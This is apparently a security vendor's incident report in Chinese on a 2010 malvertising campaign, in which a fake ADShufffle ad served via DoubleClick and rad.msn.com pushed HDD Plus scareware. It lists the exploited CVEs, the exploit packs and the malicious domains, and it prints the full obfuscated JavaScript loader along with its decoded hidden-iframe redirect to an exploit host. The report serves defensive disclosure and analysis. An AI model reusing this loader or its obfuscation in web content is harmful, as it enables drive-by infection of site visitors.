前些日子以來,我們看到了很多人感染HDD-plus這個惡意軟件,當受害者的電腦被安裝了此一軟件後,會讓受害者的電腦無法順利使用,並會看到一連串系統發生錯誤的訊息,然後要求你花錢購買它來修復這些問題。
更多有關HDD Plus惡意軟件的相關訊息這裡 還有 這裡。
我們查覺到這個HDD Plus惡意軟件其中的一個主要散播管道是透過惡意廣告利用Drive-by Download,在DoubleClick(Google)及rad.msn.com(Microsoft)這兩個網路上最大的廣告平台上進行散播的。
技術細節報告:
概要
行為描述: 當使用者瀏覽一個含有來自DoubleClick或rad.msn.com的廣告時,會載入一段從ADShufffle.com(注意,這邊有3個f)產生出來的惡意javascript,然後開始drive-by download的程序,一旦成功這個HDD Plus及其它的惡意軟件將會安裝至受害者的電腦中,使用者不用點擊只是簡單的看到這個網頁就被感染。
已知受影響的網站:
含有DoubleClick或rad.msn.com廣告的網站,其中包括如Scout.com(使用DoubleClick)、realestate.msn.com、msnbc.com(兩個都有使用)以及mail.live.com等等。除此之外,我們相信還有更多的廣告交換平台,都可能曾經發出過這個假ADShufffle的惡意廣告。
重要的日期:
12月2日:駭客註冊相關的惡意網域
12月3日:HackAlert第一次偵測到DoubleClick含有惡意廣告的時間為(2010-12-04T02:18:50+00:00GMT)。由於HackAlert每天所偵測到的惡意網頁數量相當大,所以我們當下並沒馬上注意到它。
12月8日:我們接獲到合作夥伴Symantec-VeriSign的請求,要我們分析一些因為被HackAlert偵測為惡意進而導致其信任標章被移除的網站。其中部分網站客戶聯繫賽門鐵克要求獲得更多訊息。HackAlert在標示異常網站時,造成客戶網站的VeriSign信任標章時有時無的狀況,客戶也質疑可能是我們的Hackalert系統有瑕疵存在,因此引起我們的關注。Symantec-VeriSign 在所有具有信任標章的客戶網站上進行掃描,以檢測網站是否受到感染,而且對於掃描的品質,不論是精準度和覆蓋率都非常慎重,我們一直致力於讓他們成為我們滿意的合作夥伴。
就在同一天,我們證實這是來自DoubleClick的廣告,並同時回報給Symantec-VeriSign。
也在同一天,我們發現DoubleClick的這個惡意廣告可能是由Adshuffle所提供的,我們隨即通知Adshuffle的President Andrea McKee。她很快就回應了我們,並希望我們能提供更多的相關資訊給她。後來她很快的指出這是三個f的(adshufffle),所以這不是他們公司。她並提到很感激這些詳細的資訊,並表示她將很快地來通知DoubleClick。
12月9日:我們接觸到了DoubleClick,在很短的幾個小時內,他們安排了一個與他們的anti-malvertising及事件處理小組的會議。我們對於DoubleClick如此迅速的行動力驚訝及印象深刻。我們提供了相關細節內容,而DoubleClick說他們已經完全掌控此事件的來龍去脈。
在那同時我們的CEO Caleb Sima收到一封私人的信件,信中指出mail.live.msn及其他的一些大型的網站透過惡意廣告進行drive-by downloads的事件發生。我們隨即調查其它的廣告交換網路,因為這個ADShufffle.com是可以欺騙多個廣告交換網路,來插入他們的惡意javascript。於是我們開始著手進行調查。
12月10日:一個私人的消息來源,提供了詳細的細節資訊給我們,我們確認了ADShufffle.com的惡意廣告也透過rad.msn.com來散播。
使用的Exploits:
最初的DoubleClick:
1) Internet Explorer iepeers (CVE-2010-0806)
之後的DoubleClick及rad.msn.com:
2) JDT: Java Web Start Arbitrary command-line injection (CVE-2010-0886)
3) Adobe Reader and Adobe Acrobat 9 GetIcon (CVE-2009-0927)
4) Microsoft MDAC RDS.Dataspace ActiveX (CVE-2006-0003)
5) Adobe Reader and Acrobat 9.x Doc.media.newPlayer ()
6) Adobe Acrobat and Reader util.printf (CVE-2008-2992)
7) Adobe Reader GetMailInfo (CVE-2007-5659)
安裝的惡意程式:
過去的一個星期以來,ADShufffle所散播的惡意程式是一直變來變去的,除了HDD Plus以外,也同時包括了其它的惡意程式如一些後門等等。之後會在這篇blog裡提供這些惡意程式的檔案來給有興趣的人分析。
使用的Exploit packs
主要是使用疑似Eleonore修改過的版本。而Neosploit也有被使用,在neosploit中惡意程式在被散播前都會被動態的加殼以避免被防毒軟體偵測到。
重要的事實:
1. 透過惡意廣告進行Drive-by download,參訪者完全不用點擊就中奬。
2. 透過世上最大的廣告平台進行散播,一些最大型的網站也都受到影響。
3. Exploits混碼的手工相當精良。
4. 最初的防毒軟體偵測率非常之低。
5. 在寫這篇blog的同時,這個ADShufffle.com仍然透過他們所註冊在進行drive-by downloads。事實上,今天他們已經註冊更多的網域了。
相關網域及IPs
adshufffle.com (63.247.64.174) (含有能產生iframe並指到惡意的exploit的javascript)
acerdse.com, blindry.com, careepi.com, colemuns.com (91.213.217.194) (含有exploits及惡意程式)
ssmmbb.com (91.213.217.193) (含有Java jar exploit)
feudari.com (91.213.217.192) (含有pdf exploit)
searchjewel.org (91.200.242.17) (含有惡意程式)
195.5.161.10 (含有Java jar exploit)
thjlnqbtgdw.com, pbcplifpgdw.com (174.132.254.18) (含有exploits及惡意程式)
續前文
攻擊細節
圖解說明 1--DoubleClick ADShufffle drive-by download malvertising
圖解說明 2--rad.msn.com ADShufffle drive-by download malvertising
第一部份--DoubleClick個案研究
首先我們先來看看DoubleClick的這個案例,我們先來瀏覽一個含有DoubleClick廣告的網站,例如Scout.com這個網站,我們可以看到HTML裡面含有一個大小為728x90的DoubleClick廣告標籤 :
<SCRIPT LANGUAGE="JavaScript">
<!-- hide from non-JavaScript browsers
document.writeln('<SCRIPT LANGUAGE="JavaScript" SRC="http://ad.doubleclick.net/adj/organicgardening/home;kw=;slot=728x90.1;topic=home;sbtpc=home;tile=1;dcopt=ist;sz=728x90;ord=' + ord + '?" type="text/javascript">');
document.writeln('</SCRIPT>');
// end hide from browsers -->
</SCRIPT>
<noscript><a href="http://ad.doubleclick.net/jump/organicgardening/home;kw=;slot=728x90.1;topic=home;sbtpc=home;tile=1;sz=728x90;ord=123456?" target="_blank"><img src="http://ad.doubleclick.net/ad/organicgardening/home;topic=home;sbtpc=home;tile=1;sz=728x90;ord=123456?" width="728" height="90" border="0" alt="" target="_blank"></a></noscript>
試著去載入它時 瀏覽會連到ad.doubleclick.net,然後得到以下連結
document.write('<script type=\"text/javascript\" src=\"http://this.content.served.by.adshufffle.com/p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d4_D7mmLupb1TWfhr91mfhH0/view.js/?sid=1953243&lpd=${4020322}&ASTPCT=${http://ad.doubleclick.net/click%3Bh%3Dv8/3a6a/3/0/%2a/w%3B233305186%3B0-0%3B0%3B12910146%3B3454-728/90%3B39673254/39691041/1%3B%3B%7Eaopt%3D2/1/7d/1%3B%7Esscs%3D%3f}\"><\/script>');document.write('\n<!-- Begin Interstitial Ad -->');
//PopUnder Power
//Credit notice must stay intact for use.
... script continues...
然後會得到來自adshufffle.com的一段javascript:
var latency='';
var reno1='%78%53%4C%';
var reno2='78%53%4C%78%53%4C%53';
var reno3='%25%4C%4A%63%4C%43%25%4C%57%25';
var reno4='%4C%6D%63%';
var reno5='4C%48';
var reno6='%32%4';
var reno7='C%42%32%4C%50%32%4C%25%57%4C%32%32%4C%43';
var reno8='%32%4C%5F%25%4C%4F%6';
var reno9='3%4C%6D%63%4C%25%25%4C%53%63%4C%25%25%4C%42%63%4C%';
var reno10='25%57%4C%48%32%4C%70%32%4C%25%';
var reno11='57%4C%5F%32%4C%25%32%4C%48%32%4C%42%32%4';
var reno12='C%50%32%4C%25%57%4C%';
var reno13='32%32%4C%53%25%4C%25';
var reno14='%25%4C%53%63%4C%25%25%4C%42%63%4C%48%32%4C%63%32%4';
var reno15='C%50%32%4C%53%57%4C%63%57%4C%35%32%4C%53%25%4C%25%';
var reno16='25%4C%5F%32%4C%6D%32%4C%25%25%4C%42%63%4C%57%32%4C%6D%32%4C%43%32%4C%4F%32%4C%4F';
var reno17='%32%4C%5F%32%4C%25%5';
var reno18='7%4C%63%32%4C%63%57%4C%53%25%4C%25%25%4C%53%63%4C%';
var reno19='43%63%4C%25%25%4C%42%63%4C%70%57%4C%35%32%4C%57%32';
var reno20='%4C%43%32%4C%48%32%4C%35%32%4C%53%25%4C%25%25%4C%3';
var reno21='5%63%4C%25%63%4C%57%63%4C%25%25%4C%42%63%4C%35%32%4C%70%57%4C%70%32%4C%43%32%4C%57%57%4C%53%25%4C%25%25%4C%50%63%4C%43%63%4C%48%63%4C%50%63%4C%32%63%4C%53%63%4C%70%63%4C%50%63%4C%70%70%4C%63%63%4C%48%25%4C%48%32%4C%70%32%4C%5F%32%4C%6D%32%4C%32%70%4C%63%63%4C%48%25%4C%25%32%4C%32%70%4C%25%63%4C%48%25%4C%63%57%4C%70%32%4C%25%57%4C%50%32%4C%63%70%4C%70%57%4C%32%32%4C%43%32%4C%57%70%4C%32%70%4C%25%63%4C%48%25%4C%42%32%4C%5F%32%4C%63%32%4C%6D%25%4C%70%57%4C%48%32%4C%57%32%4C%25%57%4C%50%32%4C%70%57%4C%6D%25%4C%57%57%4C%57%57%4C%57%57%4C%32%70%4C%25%63%4C%48%25%4C%32%70%4C%25%63%4C%48%25%4C%50%70%4C%63%63%4C%48%25%4C%53%57%4C%70%57%4C%70%57%4C%35%32%4C%5F%63%4C%42%63%4C%63%57%4C%63%32%4C%63%57%4C%63%57%4C%6D%57%4C%4A%63%4C%50%63%4C%5F%25%4C%70%32%4C%57%63%4C%5F%25%4C%50%63%4C%5F%25%4C%25%63%4C%42%63%4C%70%57%4C%53%57%4C%5F%32%4C%50%32%4C%6D%57%4C%4A%63%4C%4A%63%4C%50%63%4C%5F%25%4C%50%63%4C%70%63%4C%53%63%4C%50%63%4C%43%63%4C%32%63%4C%43%63%4C%63%63%4C%5F%25%4C%70%63%4C%48%63%4C%25%63%4C%63%63%4C%57%63%4C%32%63%4C%43%63%4C%63%63%4C%4A%63%4C%53%63%4C%43%63%4C%5F%25%4C%35%63%4C%25%63%4C%57%63%4C%42%25%4C%70%63%4C%48%63%4C%70%63%4C%63%63%4C%4A%63%4C%32%63%4C%70%63%4C%50%63%4C%53%63%4C%50%63%4C%43%63%4C%25%63%4C%50%63%4C%4A%63%4C%53%63%4C%4A%63%4C%53%63%4C%42%25%4C%53%63%4C%4A%63%4C%32%63%4C%35%63%4C%50%63%4C%48%63%4C%53%63%4C%63%63%4C%63%63%4C%63%63%4C%25%63%4C%4A%63%4C%57%57%4C%5F%25%4C%78%25%4C%5F%25%4C%53%63%4C%5F%25%4C%63%63%4C%5F%25%4C%50%32%4C%32%63%4C%50%32%4C%63%63%4C%5F%25%4C%35%63%4C%32%57%4C%42%63%4C%35%32%4C%4A%63%4C%4A%32%4C%63%32%4C%43%32%4C%4F%32%4C%63%32%4C%5F%25%4C%70%57%4C%48%32%4C%6D%32%4C%6D%25%4C%4A%32%4C%63%32%4C%43%32%4C%4F%32%4C%63%32%4C%48%32%4C%4F%32%4C%25%32%4C%48%57%4C%5F%32%4C%70%32%4C%6D%25%4C%70%32%4C%50%32%4C%5F%25%4C%5F%25%4C%78%63%4C%53%57%4C%70%57%4C%70%57%4C%35%32%4C%42%63%4C%4F%32%4C%25%57%4C%48%57%4C%32%25%4C%53%63%4C%43%63%4C%42%63%4C%35%32%4C%32%25%4C%35%63%4C%25%63%4C%57%63%4C%42%63%4C%57%57%4C%32%25%4C%32%32%4C%57%57%4C%63%57%4C%6D%25%4C%53%63%4C%43%63%4C%35%57%4C%35%63%4C%25%63%4C%57%63%4C%5F%48%4C%70%32%4C%25%57%4C%50%32%4C%63%70%4C%70%57%4C%32%32%4C%43%32%4C%57%70%4C%43%57%4C%50%32%4C%70%32%4C%43%32%4C%4F%32%4C%5F%32%4C%35%70%4C%53%63%4C%50%63%4C%5F%25%4C%70%32%4C%25%57%4C%50%32%4C%63%32%4C%25%57%4C%32%32%4C%43%32%4C%57%32%4C%5F%48%4C%70%57%4C%48%32%4C%57%32%4C%25%57%4C%50%32%4C%70%57%4C%5F%25%4C%48%32%4C%63%32%4C%25%57%4C%48%32%4C%42%32%4C%42%32%4C%5F%32%4C%63%70%4C%57%32%4C%43%32%4C%25%70%4C%50%32%4C%5F%25%4C%25%32%4C%70%32%4C%25%32%4C%5F%25%4C%42%32%4C%5F%32%4C%63%32%4C%6D%25%4C%48%32%4C%4F%32%4C%32%32%4C%32%32%4C%32%32%4C%48%57%4C%35%32%4C%63%57%4C%70%32%4C%50%32%4C%6D%25%4C%43%57%4C%25%32%4C%6D%25%4C%70%32%4C%48%32%4C%32%57%4C%25%57%4C%48%32%4C%63%57%4C%6D%25%4C%70%57%4C%6D%32%4C%48%32%4C%70%57%4C%6D%32%4C%5F%32%4C%63%32%4C%6D%25%4C%63%57%4C%43%32%4C%35%32%4C%70%57%4C%5F%25%4C%5F%25%4C%78%63%4C%53%57%4C%70%57%4C%70%57%4C%35%32%4C%42%63%4C%63%32%4C%25%57%4C%63%57%4C%5F%63%4C%53%57%4C%35%32%4C%53%57%4C%6D%25%4C%25%57%4C%48%32%4C%70%32%4C%50%32%4C%5F%32%4C%4F%32%4C%42%25%4C%35%32%4C%63%57%4C%50%32%4C%4F%32%4C%32%32%4C%5F%25%4C%63%57%4C%25%57%4C%48%32%4C%6D%32%4C%6D%32%4C%50%32%4C%25%32%4C%5F%25%4C%42%32%4C%5F%32%4C%63%32%4C%6D%25%4C%48%32%4C%4F%32%4C%32%32%4C%32%32%4C%32%32%4C%48%57%4C%35%32%4C%63%57%4C%70%32%4C%50%32%4C%6D%25%4C%43%57%4C%25%32%4C%6D%25%4C%70%32%4C%48%32%4C%32%57%4C%25%57%4C%48%32%4C%63%57%4C%6D%25%4C%70%57%4C%6D%32%4C%48%32%4C%70%57%4C%6D%32%4C%5F%32%4C%63%32%4C%6D%25%4C%63%57%4C%43%32%4C%35%32%4C%70%57%4C%5F%25%4C%5F%25%4C%78%63%4C%53%57%4C%70%57%4C%70%57%4C%35%32%4C%25%25%4C%42%63%4C%63%32%4C%25%57%4C%63%57%4C%53%25%4C%48%32%4C%42%32%4C%50%32%4C%25%57%4C%32%32%4C%43%32%4C%4F%63%4C%57%25%4C%35%25%4C%48%32%4C%70%57%4C%43%32%4C%25%57%4C%57%57%4C%6D%25%4C%70%57%4C%6D%32%4C%48%32%4C%42%32%4C%48%57%4C%63%32%4C%5F%32%4C%70%32%4C%78%53%4C%78%53%4C%42%57%4C%78%53%4C%78%53%4C%78%53%4C%4A%63%4C%43%25%4C%43%25%4C%25%25%4C%48%70%4C%63%63%4C%48%25%4C%48%32%4C%42%32%4C%50%32%4C%25%57%4C%32%32%4C%43%32%4C%5F%25%4C%63%70%4C%63%63%4C%48%25%4C%48%70%4C%63%63%4C%48%25%4C%53%25%4C%57%25%4C%50%63%4C%57%25%4C%42%63%4C%70%57%4C%35%32%4C%57%32%4C%43%32%4C%48%32%4C%35%32%4C%53%25%4C%57%25%4C%50%63%4C%57%25%4C%42%63%4C%35%32%4C%70%57%4C%70%32%4C%43%32%4C%57%57%4C%53%25%4C%57%25%4C%4A%63%4C%6D%32%4C%48%32%4C%70%32%4C%70%32%4C%43%32%4C%35%32%4C%78%63%4C%43%57%4C%70%57%4C%43%32%4C%4F%32%4C%43%32%4C%25%32%4C%43%32%4C%63%57%4C%43%32%4C%32%57%4C%57%25%4C%42%63%4C%48%32%4C%4F%32%4C%43%57%4C%70%57%4C%63%57%4C%53%25%4C%57%25%4C%63%63%4C%70%63%4C%25%63%4C%63%63%4C%48%63%4C%43%63%4C%50%63%4C%42%63%4C%70%32%4C%43%32%4C%5F%63%4C%53%57%4C%35%32%4C%53%57%4C%6D%25%4C%48%32%4C%5F%48%4C%63%57%4C%78%32%4C%5F%48%4C%63%57%4C%70%57%4C%50%32%4C%70%57%4C%63%57%4C%5F%25%4C%42%32%4C%5F%32%4C%63%32%4C%6D%25%4C%48%32%4C%4F%32%4C%32%32%4C%32%32%4C%32%32%4C%48%57%4C%35%32%4C%63%57%4C%70%32%4C%50%32%4C%6D%25%4C%43%57%4C%25%32%4C%6D%25%4C%70%32%4C%48%32%4C%32%57%4C%25%57%4C%48%32%4C%63%57%4C%6D%25%4C%70%57%4C%6D%32%4C%48%32%4C%70%57%4C%6D%32%4C%5F%32%4C%63%32%4C%6D%25%4C%63%57%4C%43%32%4C%35%32%4C%70%57%4C%5F%25%4C%5F%25%4C%78%63%4C%53%57%4C%70%57%4C%70%57%4C%35%32%4C%57%25%4C%42%63%4C%63%32%4C%25%57%4C%63%57%4C%53%25%4C%48%32%4C%42%32%4C%50%32%4C%25%57%4C%32%32%4C%43%32%4C%63%70%4C%63%63%4C%48%25%4C%25%25%4C%35%25%4C%48%32%4C%53%57%4C%50%32%4C%63%32%4C%63%57%4C%48%32%4C%6D%32%4C%48%57%4C%35%25%4C%48%32%4C%70%57%4C%43%32%4C%25%57%4C%57%57%4C%6D%25%4C%70%57%4C%6D%32%4C%48%32%4C%42%32%4C%48%57%4C%63%32%4C%5F%32%4C%70%32%4C%78%53%4C%78%53%4C%53%25%4C%4A%63%4C%43%25%4C%43%25%4C%25%25%4C%48%70%4C%63%63%4C%48%25%4C%48%32%4C%42%32%4C%50%32%4C%25%57%4C%32%32%4C%43%32%4C%5F%25%4C%63%70%4C%63%63%4C%48%25%4C%48%70%4C%63%63%4C%48%25%4C%53%25%4C%57%25%4C%50%63%4C%57%25%4C%42%63%4C%70%57%4C%35%32%4C%57%32%4C%43%32%4C%48%32%4C%35%32%4C%53%25%4C%57%25%4C%50%63%4C%57%25%4C%42%63%4C%35%32%4C%70%57%4C%70%32%4C%43%32%4C%57%57%4C%53%25%4C%57%25%4C%4A%63%4C%6D%32%4C%48%32%4C%70%32%4C%70%32%4C%43%32%4C%35%32%4C%78%63%4C%43%57%4C%70%57%4C%43%32%4C%4F%32%4C%43%32%4C%25%32%4C%43%32%4C%63%57%4C%43%32%4C%32%57%4C%57%25%4C%42%63%4C%48%32%4C%4F%32%4C%43%57%4C%70%57%4C%63%57%4C%53%25%4C%57%25%4C%70%57%4C%5F%32%4C%5F%32%4C%25%57%4C%42%63%4C%48%57%4C%32%25%4C%70%32%4C%32%63%4C%32%32%4C%50%63%4C%50%63%4C%35%63%4C%57%63%4C%48%63%4C%70%63%4C%57%63%4C%43%63%4C%63%63%4C%70%32%4C%57%63%4C%70%32%4C%43%63%4C%35%63%4C%63%32%4C%63%63%4C%25%32%4C%70%32%4C%63%32%4C%63%63%4C%48%63%4C%48%63%4C%53%63%4C%70%32%4C%63%63%4C%43%63%4C%48%32%4C%25%63%4C%43%63%4C%42%63%4C%43%57%4C%48%32%4C%4A%32%4C%5F%63%4C%53%57%4C%35%32%4C%53%57%4C%6D%25%4C%57%57%4C%5F%32%4C%35%32%4C%63%57%4C%5F%25%4C%57%32%4C%48%32%4C%63%57%4C%53%57%4C%48%57%4C%53%57%4C%5F%25%4C%42%32%4C%5F%32%4C%63%32%4C%6D%25%4C%63%57%4C%6D%32%4C%48%57%4C%42%32%4C%48%32%4C%4F%32%4C%5F%32%4C%63%32%4C%5F%25%4C%5F%25%4C%78%63%4C%53%57%4C%70%57%4C%70%57%4C%35%32%4C%57%25%4C%42%63%4C%63%32%4C%25%57%4C%63%57%4C%53%25%4C%48%32%4C%42%32%4C%50%32%4C%25%57%4C%32%32%4C%43%32%4C%63%70%4C%63%63%4C%48%25%4C%25%25%4C%35%25%4C%48%32%4C%53%57%4C%50%32%4C%63%32%4C%63%57%4C%48%32%4C%6D%32%4C%48%57%4C%35%25%4C%48%32%4C%70%57%4C%43%32%4C%25%57%4C%57%57%4C%6D%25%4C%70%57%4C%6D%32%4C%48%32%4C%42%32%4C%48%57%4C%63%32%4C%5F%32%4C%70%32%4C%78%53%4C%43%53%4C%43%53%4C%78%53%4C%78%53%4C%4A%57%4C%53%25%4C%53%25%4C%48%32%4C%63%57%4C%4F%32%4C%48%32%4C%53%25%4C%53%25%4C%42%57%4C%78%53%4C%4A%63%4C%43%25%4C%43%25%4C%25%25%4C%48%70%4C%63%63%4C%48%25%4C%48%32%4C%42%32%4C%50%32%4C%25%57%4C%32%32%4C%43%32%4C%5F%25%4C%63%70%4C%63%63%4C%48%25%4C%48%70%4C%63%63%4C%48%25%4C%53%25%4C%53%25%4C%57%25%4C%53%63%4C%57%25%4C%42%63%4C%70%57%4C%35%32%4C%57%32%4C%43%32%4C%48%32%4C%35%32%4C%53%25%4C%57%25%4C%53%63%4C%57%25%4C%42%63%4C%35%32%4C%70%57%4C%70%32%4C%43%32%4C%57%57%4C%53%25%4C%57%25%4C%4A%63%4C%6D%32%4C%48%32%4C%70%32%4C%70%32%4C%43%32%4C%35%32%4C%78%63%4C%43%57%4C%70%57%4C%43%32%4C%4F%32%4C%43%32%4C%25%32%4C%43%32%4C%63%57%4C%43%32%4C%32%57%4C%57%25%4C%42%63%4C%48%32%4C%4F%32%4C%43%57%4C%70%57%4C%63%57%4C%53%25%4C%57%25%4C%50%63%4C%42%63%4C%48%32%4C%32%25%4C%53%63%4C%42%63%4C%63%57%4C%32%25%4C%63%63%4C%70%63%4C%25%63%4C%63%63%4C%48%63%4C%43%63%4C%50%63%4C%42%63%4C%70%32%4C%43%32%4C%5F%63%4C%53%57%4C%35%32%4C%53%57%4C%6D%25%4C%70%57%4C%5F%48%4C%63%57%4C%70%57%4C%50%32%4C%70%57%4C%63%57%4C%5F%25%4C%42%32%4C%5F%32%4C%63%32%4C%6D%25%4C%48%32%4C%4F%32%4C%32%32%4C%32%32%4C%32%32%4C%48%57%4C%35%32%4C%63%57%4C%70%32%4C%50%32%4C%6D%25%4C%43%57%4C%25%32%4C%6D%25%4C%70%32%4C%48%32%4C%32%57%4C%25%57%4C%48%32%4C%63%57%4C%6D%25%4C%70%57%4C%6D%32%4C%48%32%4C%70%57%4C%6D%32%4C%5F%32%4C%63%32%4C%6D%25%4C%63%57%4C%43%32%4C%35%32%4C%70%57%4C%5F%25%4C%5F%25%4C%78%63%4C%53%57%4C%70%57%4C%70%57%4C%35%32%4C%57%25%4C%42%63%4C%63%32%4C%25%57%4C%63%57%4C%53%25%4C%48%32%4C%42%32%4C%50%32%4C%25%57%4C%32%32%4C%43%32%4C%63%70%4C%63%63%4C%48%25%4C%25%25%4C%35%25%4C%48%32%4C%53%57%4C%50%32%4C%63%32%4C%63%57%4C%48%32%4C%6D%32%4C%48%57%4C%35%25%4C%48%32%4C%70%57%4C%43%32%4C%25%57%4C%57%57%4C%6D%25%4C%70%57%4C%6D%32%4C%48%32%4C%42%32%4C%48%57%4C%63%32%4C%5F%32%4C%70%32%4C%78%53%4C%4A%57%4C%53%25%4C%43%25%4C%53%25%4C%4F%32%4C%4F%32%4C%48%57%4C%6D%32%4C%53%25%4C%42%63%4C%50%25%4C%53%25%4C%35%32%4C%63%32%4C%70%57%4C%42%32%4C%53%25%4C%35%25%4C%53%25%4C%32%32%4C%43%32%4C%78%53%4C%78%53%4C%78%53%4C%78%53%4C%4A%63%4C%43%25%4C%4F%32%4C%42%32%4C%70%57%4C%63%32%4C%43%32%4C%70%57%4C%50%32%4C%70%57%4C%63%57%4C%35%25%4C%35%32%4C%63%32%4C%70%57%4C%50%32%4C%42%32%4C%6D%25%4C%70%57%4C%5F%48%4C%4F%32%4C%4F%32%4C%50%32%4C%53%25%4C%42%63%4C%53%25%4C%35%32%4C%63%32%4C%70%57%4C%42%32%4C%53%25%4C%25%57%4C%50%32%4C%32%57%4C%78%53%4C%4A%63%4C%25%25%4C%25%25%4C%53%25%4C%42%63%4C%53%25%4C%70%57%4C%5F%48%4C%4F%32%4C%4F%32%4C%50%32%4C%53%25%4C%25%57%4C%50%32%4C%32%57%4C%78%53%4C%78%53%4C%4A%63%4C%43%25%4C%53%63%4C%32%63%4C%53%25%4C%78%25%4C%53%25%4C%53%63%4C%32%63%4C%53%25%4C%78%25%4C%53%25%4C%53%63%4C%53%63%4C%53%63%4C%50%63%4C%35%25%4C%53%25%4C%5F%25%4C%53%25%4C%43%25%4C%43%25%4C%43%25%4C%50%63%4C%42%25%4C%43%25%4C%25%25%4C%53%25%4C%25%25%4C%35%25%4C%32%32%4C%5F%70%4C%35%57%4C%48%32%4C%70%32%4C%6D%32%4C%43%70%4C%70%57%4C%63%57%4C%50%32%4C%4F%32%4C%6D%25%4C%43%25%4C%35%25%4C%57%32%4C%6D%32%4C%43%32%4C%25%57%4C%70%57%4C%63%48%4C%70%48%4C%42%70%4C%57%70%4C%5F%32%4C%70%57%4C%6D%25%4C%43%25%4C%53%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%50%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%43%25%4C%35%25%4C%25%57%4C%50%32%4C%48%32%4C%43%48%4C%4F%32%4C%4F%32%4C%48%57%4C%32%70%4C%70%57%4C%48%32%4C%57%32%4C%6D%25%4C%43%25%4C%35%25%4C%48%32%4C%70%57%4C%50%32%4C%70%70%4C%53%25%4C%57%57%4C%48%32%4C%6D%32%4C%35%25%4C%48%32%4C%70%57%4C%50%32%4C%70%70%4C%53%25%4C%57%57%4C%48%32%4C%6D%32%4C%53%25%4C%4F%25%4C%53%63%4C%35%25%4C%57%32%4C%6D%32%4C%43%32%4C%25%57%4C%70%57%4C%63%57%4C%25%32%4C%48%57%4C%63%57%4C%6D%25%4C%43%25%4C%35%25%4C%57%32%4C%6D%32%4C%43%32%4C%25%57%4C%70%57%4C%63%48%4C%70%48%4C%42%70%4C%57%70%4C%5F%32%4C%70%57%4C%6D%25%4C%43%25%4C%53%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%50%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%43%25%4C%35%25%4C%25%57%4C%50%32%4C%48%32%4C%43%48%4C%4F%32%4C%4F%32%4C%48%57%4C%32%70%4C%70%57%4C%48%32%4C%57%32%4C%6D%25%4C%43%25%4C%35%25%4C%48%32%4C%70%57%4C%50%32%4C%70%70%4C%53%25%4C%57%57%4C%48%32%4C%6D%32%4C%35%25%4C%48%32%4C%70%57%4C%50%32%4C%70%70%4C%53%25%4C%57%57%4C%48%32%4C%6D%32%4C%35%25%4C%48%32%4C%70%57%4C%50%32%4C%70%70%4C%53%25%4C%57%57%4C%48%32%4C%6D%32%4C%53%25%4C%42%25%4C%53%25%4C%43%25%4C%53%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%50%63%4C%53%25%4C%4F%25%4C%53%63%4C%53%25%4C%4F%25%4C%43%25%4C%35%25%4C%25%57%4C%50%32%4C%48%32%4C%43%48%4C%4F%32%4C%4F%32%4C%48%57%4C%32%70%4C%70%57%4C%48%32%4C%57%32%4C%6D%25%4C%43%25%4C%35%25%4C%48%32%4C%70%57%4C%50%32%4C%70%70%4C%53%25%4C%57%57%4C%48%32%4C%6D%32%4C%35%25%4C%48%32%4C%70%57%4C%50%32%4C%70%70%4C%53%25%4C%57%57%4C%48%32%4C%6D%32%4C%35%25%4C%53%25%4C%42%63%4C%53%25%4C%4F%32%4C%42%32%4C%70%57%4C%63%32%4C%43%32%4C%70%57%4C%50%32%4C%70%57%4C%63%57%4C%78%53%4C';
latency=reno1+reno2+reno3+reno4+reno5+reno6;
latency=latency+reno7+reno8+reno9+reno10+reno11+reno12+reno13;
latency=latency+reno14+reno15+reno16+reno17+reno18+reno19+reno20+reno21;
latency=unescape(latency);
var nerostrd=latency;
var i=nerostrd.length;
i=i-1;
var jamdv='';
for (var x = i; x >=0; x--)
{
jamdv=jamdv+nerostrd.charAt(x);
}
latency=jamdv;
var plemoza="012345"+"6789abcde"+"fghijklmn"+"opqrstuvwx"+"yzABCDEFGHIJ"+"KLMNOPQ"+"RSTUVWXYZ/.:_-?&=%";
var stroninfl="SP%cpH2W5C"+"83fEX:1r"+"jF9AQdM"+"lKi/sk4GuvtxJOB"+"m_U.Nq"+"zY7aw&nhgZo"+"VT=0IbRDye?6-L";
var fallingms="";
var rttcp;
var ferrana;
for(rttcp=0;rttcp<latency.length;rttcp++)
{
ferrana=stroninfl.indexOf(latency.charAt(rttcp));
var konterrap=1-2;
if(ferrana>konterrap)
{
fallingms+=plemoza.charAt(ferrana);
}
}
eval(unescape(fallingms));
上面這段混碼的javascript經過解碼後會得到:
statictml = (new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0) - new Date(new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().substring(0, new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().lastIndexOf(" ")-1))) / (1000 * 60 * 60);
var all_t = "";
var mtch = all_t.match(statictml);
if ( mtch != null ) {
document.write(unescape("%3Ciframe src='http://this.content.served.by.adshufffle.com/stats_t.php?id=1953243&s=0&e=1' style='visibility:hidden;' width='0' height='0' %3E%3C/iframe%3E"));
} else {
document.write(unescape("%3Ciframe src='http://colemuns.com/pupseg/show.php?key=92e93d0553cdb3c89d7d397457811f6d&u=root' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
document.write(unescape("%3Ciframe src='http://this.content.served.by.adshufffle.com/stats_js_e.php?id=1953243' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
}
document.write('<iframe src="http://this.content.served.by.adshufffle.com/banners/flash-loader.php?src=http://this.content.served.by.adshufffle.com/bdb/aBigCommerce/target_gifrcard/10HolidayGiftCard_728x90.swf&w=728&h=90&url=http://ad.doubleclick.net/click;h=v8/3a6a/3/0/*/w;233305186;0-0;0;12910146;3454-728/90;39673254/39691041/1;;~aopt=2/1/7d/1;~sscs=?http%3A%2F%2Fwww.target.com%2FGiftCards%2Fb%3Fnode%3D14061591" width="728" height="90" scrolling="no" hspace="0" frameborder="0"></iframe>');
